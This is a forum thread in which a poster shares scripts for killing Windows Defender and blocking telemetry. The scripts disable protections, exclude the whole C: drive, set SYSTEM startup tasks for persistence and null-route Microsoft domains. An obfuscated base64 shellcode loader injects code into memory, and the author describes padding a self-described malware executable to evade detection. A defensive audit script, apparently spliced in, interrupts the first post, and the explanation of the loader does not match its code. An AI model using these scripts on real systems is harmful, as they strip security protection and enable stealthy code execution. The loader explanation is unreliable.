Windows Defender is the worst and i'm going to kill it.

  1. #1
    Sophie Pedophile Tech Support
    That's right, it's another issue of Sophie's Cyber Shenanigans [Anti Telemetry (Again!) and More!] Edition. With even more scripts, more flavor text, and the best part is i did all the boring stuff for you so you don't have to.


    Ever want to write malware, exploits, a crypter or what have you and not have Micrococks have a copy of your source and final product before you even have your C2 online? Yeah? Well first of all use Windows Server 2016 Enterprise Edition and configure it properly when installing. Or get the Windows Deployment Kit for a custom Win10 install. But protip just running Win2016 Enterprise is easiest and works best IMO.

    However ain't nobody got time for that and you already have your Win10 box and you want to use that one, i feel you.

    If you're a skid and just want to download some hacking tools and start blasting but can't because WinDefend keeps quarantining everything as either potential malware, hacking tool, and/or PUP.
    Or if you are a casual user, you might like Micrococks not to have all your data by ways of telemetry. I posted a thread with scripts and source to kill telemetry and for a Windows Service in C++ to automate the whole lot here in T&T as well, but no need to open another tab, i gotchu fam.

    Both with a lot of telemetry and automated housekeeping that Windows does, Windows Defender is responsible for the most egregious shit. Hence the title of the thread. I wrote this script to rectify some of that.

    ##-!NOTICE!-##
    # You may want to give this a look over if you simply want to maim
    # not kill Windows Defender

    Write-Host "[+]If you don't know what you're doing, stop executing this script." -ForegroundColor Green
    # Read-Host has no colour switch; it simply waits for Enter
    Read-Host "If you do know, press any key to continue..." | Out-Null

    try {
        # The policy keys have to exist before values can be written under them
        New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft' -Name "Windows Defender" -Force -ea 0 | Out-Null
        New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name "Spynet" -Force -ea 0 | Out-Null
        New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft' -Name "MRT" -Force -ea 0 | Out-Null
        # Pretty self explanatory
        New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
        # This is the kind of shit Windows gets up to when it thinks you're idling
        New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRoutinelyTakingAction" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
        # Spynet? No, doesn't seem suspicious to me guvner, honest
        New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SpyNetReporting" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
        # Windows assumes consent, don't touch my freaking samples bro. Not cool
        New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SubmitSampleConsent" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
        # No one needs to know...
        New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MRT" -Name "DontReportInfectionInformation" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
        # These features can die in a fire, look it over in case you'd like to comment
        # out some lines if you wanna play it safe, i like living on the edge
        # (6.1.7601 is Windows 7 SP1, which has no Defender cmdlets)
        if (-Not ((Get-WmiObject -Class Win32_OperatingSystem).Version -eq "6.1.7601")) {
            Add-MpPreference -ExclusionPath "C:\" -Force -ea 0 | Out-Null
            Set-MpPreference -DisableArchiveScanning $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableBlockAtFirstSeen $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableCatchupFullScan $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableCatchupQuickScan $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableIntrusionPreventionSystem $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableIOAVProtection $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableRealtimeMonitoring $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableRestorePoint $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableScanningNetworkFiles $true -Force -ea 0 | Out-Null
            Set-MpPreference -DisableScriptScanning $true -Force -ea 0 | Out-Null
            Set-MpPreference -EnableControlledFolderAccess Disabled -Force -ea 0 | Out-Null
            Set-MpPreference -EnableNetworkProtection AuditMode -Force -ea 0 | Out-Null
            Set-MpPreference -MAPSReporting Disabled -Force -ea 0 | Out-Null
            Set-MpPreference -SubmitSamplesConsent NeverSend -Force -ea 0 | Out-Null
            Set-MpPreference -PUAProtection Disabled -Force -ea 0 | Out-Null
        }
    } catch {
        Write-Warning "Failed to disable Windows Defender component"
    }

    # If this errors out you either don't have the right permissions or the service has already been stopped
    try {
        Get-Service WinDefend | Stop-Service -Force
        Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\Windefend" -Name "Start" -Value 4 -Type DWORD -Force
    } catch {
        Write-Warning "Failed to disable WinDefend Service"
    }


    Make a text file and paste the code block. Save it as something like windef.ps1.

    I would recommend running this as at least a Domain Admin, or straight up NT AUTHORITY\System if you can. A simple way to do that (kinda) is to create a scheduled task and set it to run at startup as the SYSTEM user. The commands for doing so would look a lot like this:


    schtasks /create /tn "windef" /tr "powershell %WINDIR%\windef.ps1" /sc onstart /ru System


    Change the details as necessary.

    If you want to take this a step further, save the following as a .bat file and run it as administrator. This script was a part of the original ensemble i had in a previous anti-telemetry thread.


    @ECHO OFF
    SETLOCAL

    echo Uninstalling updates relevant to telemetry ops
    echo Delete KB2902907 (Microsoft Security Essentials)
    start "title" /b /wait wusa.exe /kb:2902907 /uninstall /quiet /norestart

    echo Delete KB3022345 (telemetry)
    start "title" /b /wait wusa.exe /kb:3022345 /uninstall /quiet /norestart

    echo Delete KB3068708 (telemetry)
    start "title" /b /wait wusa.exe /kb:3068708 /uninstall /quiet /norestart

    echo Delete KB3080149 (Telemetry)
    start "title" /b /wait wusa.exe /kb:3080149 /uninstall /quiet /norestart


    In order to be thorough and have a good use for another older script of mine we'll be blocking domains Micro$oft runs in order to receive things like telemetry and samples.

    Ideally you would blacklist these in your router. Alternatively we can basically null-route them for all intents and purposes at the OS Networking level. What we will need is a BlackHole server, a Proxy Auto Config script, and a web server to serve the proxy config locally.

    Here's my implementation of an HTTP server in PowerShell.

    # PowerShell RegEdit and HTTP Server
    $registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"
    $Name = "EnableLegacyAutoProxyFeatures"
    $value = 1

    # Create the policy subkey if it doesn't exist, then set the value
    if (!(Test-Path $registryPath)) {
        New-Item -Path $registryPath -Force | Out-Null
    }
    New-ItemProperty -Path $registryPath -Name $Name -Value $value `
        -PropertyType DWORD -Force | Out-Null

    # Http Server
    $http = [System.Net.HttpListener]::new()

    # Listen at 8080
    $http.Prefixes.Add("http://localhost:8080/")

    # Start the Http Server
    $http.Start()

    # Confirm
    if ($http.IsListening) {
        Write-Host " HTTP Server Listening " -ForegroundColor Green
        Write-Host " Please direct Windows Auto Proxy Config to http://127.0.0.1:8080/ " -ForegroundColor Green
    }

    # Server Loop
    while ($http.IsListening) {
        $context = $http.GetContext()

        if ($context.Request.HttpMethod -eq 'GET' -and $context.Request.RawUrl -eq '/') {
            # Log to terminal
            Write-Host "$($context.Request.UserHostAddress) => $($context.Request.Url)" -ForegroundColor Green

            # Get proxy.pac data
            # Don't forget to change this to reflect the situation at your end
            [string]$data = Get-Content "C:\some\path\proxy.pac" -Raw

            # Field the request; PAC consumers expect this content type
            $buffer = [System.Text.Encoding]::UTF8.GetBytes($data)
            $context.Response.ContentType = "application/x-ns-proxy-autoconfig"
            $context.Response.ContentLength64 = $buffer.Length
            $context.Response.OutputStream.Write($buffer, 0, $buffer.Length) # Data stream
            $context.Response.OutputStream.Close() # Close
        } else {
            # Anything else gets a 404 so the client isn't left hanging
            $context.Response.StatusCode = 404
            $context.Response.Close()
        }
    }


    Proxy Auto Config Scripts have to be in JavaScript. I have made some adjustments to this one with regards to the one i had in my other thread. Basically we're not going to bother routing normal traffic through tor this time.

    // Proxy Auto Config script. Serve it as plain JavaScript with
    // Content-Type: application/x-ns-proxy-autoconfig (no <script> tags)

    // Declare vars
    var normal = "DIRECT";
    var blackhole = "PROXY 127.0.0.1:55555";

    function FindProxyForURL(url, host) {
        // Resolve once; dnsResolve() returns null when the name doesn't resolve
        var ip = dnsResolve(host);

        // Plain host names, *.local and private/loopback ranges go DIRECT.
        // The original tested dnsResolve(host) here, which is truthy for any
        // resolvable name and would have sent every request DIRECT.
        if (isPlainHostName(host) || shExpMatch(host, '*.local')
            || (ip && (isInNet(ip, '10.0.0.0', '255.0.0.0')
                    || isInNet(ip, '172.16.0.0', '255.240.0.0')
                    || isInNet(ip, '192.168.0.0', '255.255.0.0')
                    || isInNet(ip, '127.0.0.0', '255.255.255.0')))) {
            return normal;
        }

        if (shExpMatch(url, "*oca.telemetry.microsoft.com*")
            || shExpMatch(url, "*telecommand.telemetry.microsoft.com*")
            || shExpMatch(url, "*oca.telemetry.microsoft.com.nsatc.net*")
            || shExpMatch(url, "*a-0001.a-msedge.net*")
            || shExpMatch(url, "*a-0002.a-msedge.net*")
            || shExpMatch(url, "*a-0003.a-msedge.net*")
            || shExpMatch(url, "*a-0004.a-msedge.net*")
            || shExpMatch(url, "*a-0005.a-msedge.net*")
            || shExpMatch(url, "*a-0006.a-msedge.net*")
            || shExpMatch(url, "*a-0007.a-msedge.net*")
            || shExpMatch(url, "*a-0008.a-msedge.net*")
            || shExpMatch(url, "*a-0009.a-msedge.net*")
            || shExpMatch(url, "*i1.services.social.microsoft.com*")
            || shExpMatch(url, "*telecommand.telemetry.microsoft.com.nsatc.net*")
            || shExpMatch(url, "*sqm.df.telemetry.microsoft.com*")
            || shExpMatch(url, "*telemetry.appex.bing.net*")
            || shExpMatch(url, "*settings-sandbox.data.microsoft.com*")
            || shExpMatch(url, "*pre.footprintpredict.com*")
            || shExpMatch(url, "*aidps.atdmt.com*")
            || shExpMatch(url, "*aka-cdn-ns.adtech.de*")
            || shExpMatch(url, "*a-msedge.net*")
            || shExpMatch(url, "*b.rad.msn.com*")
            || shExpMatch(url, "*az361816.vo.msecnd.net*")
            || shExpMatch(url, "*b.ads1.msn.com*")
            || shExpMatch(url, "*b.ads2.msads.net*")
            || shExpMatch(url, "*watson.telemetry.microsoft.com*")
            || shExpMatch(url, "*wes.df.telemetry.microsoft.com*")
            || shExpMatch(url, "*bs.serving-sys.com*")
            || shExpMatch(url, "*redir.metaservices.microsoft.com*")
            || shExpMatch(url, "*reports.wes.df.telemetry.microsoft.com*")
            || shExpMatch(url, "*cs1.wpc.v0cdn.net*")
            || shExpMatch(url, "*corpext.msitadfs.glbdns2.microsoft.com*")
            || shExpMatch(url, "*df.telemetry.microsoft.com*")
            || shExpMatch(url, "*services.wes.df.telemetry.microsoft.com*")
            || shExpMatch(url, "*watson.telemetry.microsoft.com.nsatc.net*")
            || shExpMatch(url, "*sqm.telemetry.microsoft.com*")
            || shExpMatch(url, "*sqm.telemetry.microsoft.com.nsatc.net*")
            || shExpMatch(url, "*watson.ppe.telemetry.microsoft.com*")
            || shExpMatch(url, "*telemetry.microsoft.com*")
            || shExpMatch(url, "*telemetry.urs.microsoft.com*")
            || shExpMatch(url, "*survey.watson.microsoft.com*")
            || shExpMatch(url, "*watson.live.com*")
            || shExpMatch(url, "*vortex-sandbox.data.microsoft.com*")
            || shExpMatch(url, "*settings-win.data.microsoft.com*")
            || shExpMatch(url, "*watson.microsoft.com*")
            || shExpMatch(url, "*db3aqu.atdmt.com*")
            || shExpMatch(url, "*diagnostics.support.microsoft.com*")
            || shExpMatch(url, "*statsfe2.update.microsoft.com.akadns.net*")
            || shExpMatch(url, "*fe2.update.microsoft.com.akadns.net*")
            || shExpMatch(url, "*schemas.microsoft.akadns.net*")
            || shExpMatch(url, "*feedback.microsoft-hohm.com*")
            || shExpMatch(url, "*feedback.search.microsoft.com*")
            || shExpMatch(url, "*statsfe1.ws.microsoft.com*")
            || shExpMatch(url, "*c.atdmt.com*")) {
            // This list may be incomplete and/or slightly outdated
            // TODO: Fix that
            return blackhole;
        } else {
            return normal;
        }
    }


    For a perfectly adequate blackhole server, pip has you covered. If you have the Python interpreter and pip installed you can use the following commands to grab the server in question.
    pip install tcp_blackhole


    Easy. When you're invoking the script either through 'python -m tcp_blackhole.py' or by calling it from a different script/utility, make sure the argument for http mode is set to True, and set the port argument to 55555 so that it's commensurate with the PAC script.

    To persist this state of affairs once everything is in place, another scheduled task may be in order.
    schtasks /create /tn "StageProxyOps" /tr "powershell %WINDIR%\HTTP-Proxy-Server.ps1" /sc onstart /ru System


    Which reminds me, if you want to try something a little more pro-active with regards to the script that kills WinDefender, i generated the following:

    Set-StrictMode -Version 2
    $dQA = @"
    using System;
    using System.Runtime.InteropServices;
    namespace c5qI1 {
    public class func {
    [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
    [Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
    [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
    [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
    [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
    }
    }
    "@

    $g_ = New-Object Microsoft.CSharp.CSharpCodeProvider
    $kp_ = New-Object System.CodeDom.Compiler.CompilerParameters
    $kp_.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
    $kp_.GenerateInMemory = $True
    $qwx = $g_.CompileAssemblyFromSource($kp_, $dQA)

    [Byte[]]$gycNB = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1XBvd2Vyc2hlbGwgLU5vUCAtZXhlYyBieXBhc3MgLlwlV0lORElSJVx3aW5leGVjMi5wczEA")
    [Uint32]$h9koM = 0

    $vnJp = [c5qI1.func]::VirtualAlloc(0, $gycNB.Length + 1, [c5qI1.func+AllocationType]::Reserve -bOr [c5qI1.func+AllocationType]::Commit, [c5qI1.func+MemoryProtection]::ReadWrite)
    if ([Bool]!$vnJp) { $global:result = 3; return }
    [System.Runtime.InteropServices.Marshal]::Copy($gycNB, 0, $vnJp, $gycNB.Length)

    if ([c5qI1.func]::VirtualProtect($vnJp,[Uint32]$gycNB.Length + 1, [c5qI1.func+MemoryProtection]::Execute, [Ref]$h9koM) -eq $true ) {
    [IntPtr] $yU_ = [c5qI1.func]::CreateThread(0,0,$vnJp,0,0,0)
    if ([Bool]!$yU_) { $global:result = 7; return }
    $nQ_ = [c5qI1.func]::WaitForSingleObject($yU_, [c5qI1.func+Time]::Infinite)
    }


    As you can see this powershell script has inline C#, that's to build a special DLL that will mimic kernel32 DLL, but for our ends. Kernel32.dll in short is involved with memory management, I/O, and its process lives in kernelland. Which is good. A bit further down you can see a Base64 encoded string, this is actually encoded shellcode and we're going to use functions imported from kernel32.dll to inject that shellcode (once decoded) into memory using the CreateRemoteThread Method. Once injected it's going to fire off the equivalent of this command: powershell -NoP -exec bypass -c .\%WINDIR%\windef.ps1.

    As you can tell it's going to assume the WinDefKiller script lives in the %WINDIR% and is called windef.ps1. The point being that when done like this you won't be running the script from your user context but it will run in the context of the process doing the invoking.

    Anyway i was bored so i made some stuff to drop the WinDefKiller script in its expected spot, automatically launch it through the script you see above and on top of that also add a scheduled task. Then i put it all together into one big beautiful executable and padded the executable out to the point of low entropy in order to fly under the radar while Windows Defender still lives. It's basically malware, so if you are feeling adventurous shoot me a message and i may send you a precompiled executable. For fully automated Windows Defender murdering madness.

    Here's what it looks like on the inside:



    Anyway i hope you found all that at least somewhat informative, but mostly useful. I genuinely despise the way Micro$oft goes about these things. Unfortunately I'm gonna have to make a new edition of this thread for Windows 11 pretty soon, i think.
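Editor's added example, not code from Sophie's post or any project: a read-only PowerShell audit that looks for exactly the changes the scripts above make (the policy keys, the Set-MpPreference flags, the drive-root exclusion, the WinDefend start type, the boot-time SYSTEM task and the EnableLegacyAutoProxyFeatures policy), plus Defender's own event log entries for protection being switched off. It assumes Windows 10 / Server 2016 or later with the Defender PowerShell module, run from an elevated prompt; the function name and the finding object shape are my own.

```powershell
# Added audit example (not from the original post). Assumes Windows 10 / Server 2016+
# with the Defender PowerShell module; run elevated. Read-only: it changes nothing.
function Get-DefenderTamperFindings {
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Area, [string]$Detail) {
        $findings.Add([pscustomobject]@{ Area = $Area; Detail = $Detail })
    }
    # 1. Policy values the windef.ps1 script writes under HKLM:\SOFTWARE\Policies
    $wd = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $policyChecks = @(
        @{ Path = $wd;          Name = 'DisableAntiSpyware';           Bad = 1 },
        @{ Path = $wd;          Name = 'DisableRoutinelyTakingAction'; Bad = 1 },
        @{ Path = "$wd\Spynet"; Name = 'SpyNetReporting';              Bad = 0 },
        @{ Path = "$wd\Spynet"; Name = 'SubmitSampleConsent';          Bad = 0 },
        @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\MRT'; Name = 'DontReportInfectionInformation'; Bad = 1 },
        @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings'
           Name = 'EnableLegacyAutoProxyFeatures'; Bad = 1 }
    )
    foreach ($c in $policyChecks) {
        $v = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
        if ($null -ne $v -and $v.($c.Name) -eq $c.Bad) {
            Add-Finding 'Policy' "$($c.Path)\$($c.Name) = $($c.Bad)"
        }
    }
    # 2. Live preferences (what Set-MpPreference / Add-MpPreference changed)
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($pref) {
        $flags = @('DisableRealtimeMonitoring', 'DisableBehaviorMonitoring', 'DisableIOAVProtection',
                   'DisableScriptScanning', 'DisableBlockAtFirstSeen', 'DisableArchiveScanning')
        foreach ($p in $flags) { if ($pref.$p) { Add-Finding 'MpPreference' "$p = True" } }
        if ($pref.MAPSReporting -eq 0)        { Add-Finding 'MpPreference' 'MAPSReporting = Disabled' }
        if ($pref.SubmitSamplesConsent -eq 2) { Add-Finding 'MpPreference' 'SubmitSamplesConsent = NeverSend' }
        if ($pref.PUAProtection -eq 0)        { Add-Finding 'MpPreference' 'PUAProtection = Disabled' }
        # An exclusion on a drive root (C:\) switches scanning off for the whole volume
        foreach ($ex in $pref.ExclusionPath) {
            if ($ex -match '^[A-Za-z]:\\?$') { Add-Finding 'MpPreference' "Drive-root exclusion: $ex" }
        }
    }
    # 3. Service start type forced to Disabled (Start = 4)
    $svc = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend' -Name Start -ErrorAction SilentlyContinue
    if ($svc -and $svc.Start -eq 4) { Add-Finding 'Service' 'WinDefend start type = Disabled (4)' }
    # 4. Boot-time scheduled tasks that run a PowerShell script as SYSTEM (schtasks /sc onstart /ru System)
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        $asSystem = $task.Principal.UserId -match 'SYSTEM|S-1-5-18'
        $atBoot = @($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskBootTrigger' }).Count -gt 0
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if ($asSystem -and $atBoot -and $cmd -match 'powershell.*\.ps1') {
                Add-Finding 'ScheduledTask' "$($task.TaskName): $cmd"
            }
        }
    }
    # 5. Defender's own log: 5001 = real-time protection disabled, 5010/5012 = antispyware/antivirus disabled
    $evt = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5001, 5010, 5012 } `
                        -MaxEvents 20 -ErrorAction SilentlyContinue
    foreach ($e in $evt) { Add-Finding 'EventLog' "$($e.TimeCreated) event $($e.Id)" }
    return $findings
}

Get-DefenderTamperFindings | Format-Table -AutoSize
```

An empty table means none of the thread's changes are present; any row is something to reconcile against change control, since Tamper Protection (where enabled) would normally log a 5013 rather than allow these edits.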
  2. #2
    aldra JIDF Controlled Opposition
    I forgot how goofy powershell syntax is
  3. #3
    Sophie Pedophile Tech Support
    Originally posted by aldra I forgot how goofy powershell syntax is

    Mandatory capitalization grinds my gears tbh.
  4. #4
    deathgrips Yung Blood
    But protip just running Win2016 Enterprise is easiest and works best IMO.
    Ever tried LTSB/LTSC? I prefer it because you have all the group policy options of enterprise but more stability/less updates/less feature changes. More stable and less shit to deal with.
    I avoid Windows at all costs but when I work with it I always have to have enterprise or ltsc so I can actually turn off telemetry.
    Btw for anyone lurking there's plenty of good powershell scripts on github that can block telemetry, remove windows store bloatware apps (i.e xbox app etc) and increase security on the home/professional versions.
  5. #5
    aldra JIDF Controlled Opposition
    Originally posted by Sophie Mandatory capitalization grinds my gears tbh.

    it's more just how long and verbose everything is that gets me

    it almost encourages you to just tab > autocomplete everything and constantly fuck up



    Originally posted by deathgrips Ever tried LTSB/LTSC? I prefer it because you have all the group policy options of enterprise but more stability/less updates/less feature changes. More stable and less shit to deal with.

    try core deployment, takes a bit of work to get set up but you can choose what 'features' to install in the first place
  6. #6
    Sophie Pedophile Tech Support
    Originally posted by aldra it's more just how long and verbose everything is that gets me

    it almost encourages you to just tab > autocomplete everything and constantly fuck up

    Maybe it's because i started out with Python instead of a lower level language that i don't mind the verbosity so much. It also depends on what you're trying to do with your script. Setting preferences, for example, is generally more verbose in syntax than writing a server.




    Originally posted by aldra try core deployment, takes a bit of work to get set up but you can choose what 'features' to install in the first place

    Definitely worth it if you take the time to do it, a lot better than LTSC. Plus LTSC has a full suite of up to date security tooling from Micro$oft, which as explored in this thread is problematic, as embedded within those are a lot of telemetry features.

    Also to address one more thing, of course there are PowerShell scripts on Github that help improve the privacy of the user. I know, because i've posted a number, through multiple accounts i keep for various reasons and via organizations and collaborations with other OSS devs interested in this kind of thing. Personally though i like to keep the more, not so much experimental, but unorthodox methods to a select group of individuals. Which is for the most part to discuss my work, provide some insight and hopefully have some insight provided to me as well if and where i've made a mistake or there is a better way to do it. I write these threads as much to learn for myself as i hope to inform others. And i think that's the right mindset we ought to take in the broader context of collaborative development and research.
  7. #7
    cigreting Dark Matter
    can u fix y my printers not workin
  8. #8
    Sophie Pedophile Tech Support
    Originally posted by cigreting can u fix y my printers not workin

    I'm not actually tech support.
  9. #9
    cigreting Dark Matter
    oh oke